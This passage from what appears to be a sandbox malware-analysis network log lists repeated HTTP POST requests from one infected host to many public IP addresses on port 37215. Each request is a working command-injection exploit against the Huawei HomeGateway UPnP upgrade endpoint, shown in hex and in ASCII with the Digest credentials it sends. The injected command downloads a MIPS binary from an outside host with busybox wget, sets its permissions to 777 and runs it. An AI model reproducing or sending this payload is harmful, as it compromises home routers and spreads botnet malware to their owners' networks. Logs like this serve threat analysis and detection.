                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    291192.168.2.2335190156.2.158.24037215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.256095886 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    292192.168.2.2345658156.125.82.9937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.256206989 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    293192.168.2.2345778197.46.115.8937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.256242037 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    294192.168.2.2337590197.1.219.7137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.256278038 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    295192.168.2.233297441.13.222.14137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.256310940 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    296192.168.2.2351756156.196.70.19937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.256369114 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    297192.168.2.2336614156.158.95.15837215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.256392956 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    298192.168.2.2344020197.204.247.19337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.256433964 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    299192.168.2.233485241.229.19.15437215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.256496906 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    300192.168.2.2355302197.177.223.22137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.256516933 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
